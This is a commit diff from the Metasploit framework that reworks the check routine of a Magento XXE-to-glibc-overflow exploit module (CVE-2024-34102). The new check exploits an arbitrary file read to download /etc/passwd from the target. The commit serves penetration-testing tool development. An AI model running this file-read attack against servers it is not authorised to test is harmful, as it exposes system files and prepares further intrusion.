Updated check method

jheysel-r7 · Oct 15, 2024 · 3f6f060 · 3f6f060
1 parent 44b33b8
commit 3f6f060
Show file tree

Hide file tree

Showing 2 changed files with 11 additions and 56 deletions.
diff --git a/lib/msf/core/exploit/remote/http/magento.rb b/lib/msf/core/exploit/remote/http/magento.rb
diff --git a/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb b/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::Remote::HTTP::Magento
   include Msf::Exploit::Retry
   prepend Msf::Exploit::Remote::AutoCheck
   require 'elftools'
@@ -96,23 +95,14 @@ def initialize(info = {})
     )
   end
 
-  def check_magento_version
-    version_info = magento_version
-    return CheckCode::Unknown('Could not detect the version.') unless version_info
-
-    return CheckCode::Safe("Detected Magento #{version_info['edition']} edition version #{version_info['version']} which is not vulnerable") unless
-      version_info['version'] <= (Rex::Version.new('2.4.7')) ||
-      version_info['version'] <= (Rex::Version.new('2.4.6-p5')) ||
-      version_info['version'] <= (Rex::Version.new('2.4.5-p7')) ||
-      version_info['version'] <= (Rex::Version.new('2.4.4-p8')) ||
-      (
-        version_info['edition'] == 'Enterprise' && (
-          version_info['version'] <= (Rex::Version.new('2.4.3-ext-7')) ||
-            version_info['version'] <= (Rex::Version.new('2.4.2-ext-7'))
-        )
-      )
-
-    CheckCode::Appears("Exploit precondition 1/3 met: Detected Magento #{version_info['edition']} edition version #{version_info['version']} which is vulnerable.")
+  def check_magento
+    etc_password = download_file('/etc/passwd')
+    vprint_status("Attempting to download /etc/passwd")
+    if etc_password.nil?
+      CheckCode::Safe('Unable to download /etc/passwd via the Arbitrary File Read (CVE-2024-34102).')
+    else
+      CheckCode::Vulnerable('Downloading /etc/passwd via the Arbitrary File Read (CVE-2024-34102) was successful.')
+    end
   end
 
   def check_php_rce_requirements
@@ -184,8 +174,9 @@ def check_libc_version
 
   def check
     setup_module
-    magento_checkcode = check_magento_version
-    return magento_checkcode unless magento_checkcode.code == 'appears'
+    print_status("module setup")
+    magento_checkcode = check_magento
+    return magento_checkcode unless magento_checkcode.code == 'vulnerable'
 
     print_good(magento_checkcode.reason)